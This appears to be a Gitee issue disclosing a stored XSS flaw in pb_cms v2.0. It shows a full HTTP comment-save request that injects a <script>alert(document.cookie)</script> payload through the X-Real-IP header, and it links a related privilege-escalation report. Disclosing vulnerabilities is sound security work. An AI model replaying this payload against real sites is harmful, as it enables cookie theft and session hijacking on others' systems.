A stored XSS vulnerability in pb_cms v2.0 IpUtil.getIpAddr()

Post comments on any articles on the front desk and grab bags
![输入图片说明](https://images.gitee.com/uploads/images/2022/0411/163618_c0454fea_6566539.png "屏幕截图.png")
![输入图片说明](https://images.gitee.com/uploads/images/2022/0411/163646_fc8798da_6566539.png "屏幕截图.png")
Add x-real-ip, replay

```
POST /blog/api/comment/save HTTP/1.1
Host: local:8899
Content-Length: 89
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://local:8899
Referer: http://local:8899/blog/article/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Real-IP: <script>alert(document.cookie)</script>

sid=1&nickname=qwe&qq=1231231231&email=123%40qq.com&content=%3Cp%3E123123%3C%2Fp%3E%0D%0A
```

Escalation of Privileges
https://gitee.com/LinZhaoguan/pb-cms/issues/I4XWJ7
![输入图片说明](https://images.gitee.com/uploads/images/2022/0411/164212_523c67be_6566539.png "屏幕截图.png")
![输入图片说明](https://images.gitee.com/uploads/images/2022/0411/164012_4e5773fe_6566539.png "屏幕截图.png")

LinZhaoguan/pb-cms

内容风险标识

评论 (1)

LinZhaoguan/pb-cms .gitee-modal { width: 500px !important; }

内容风险标识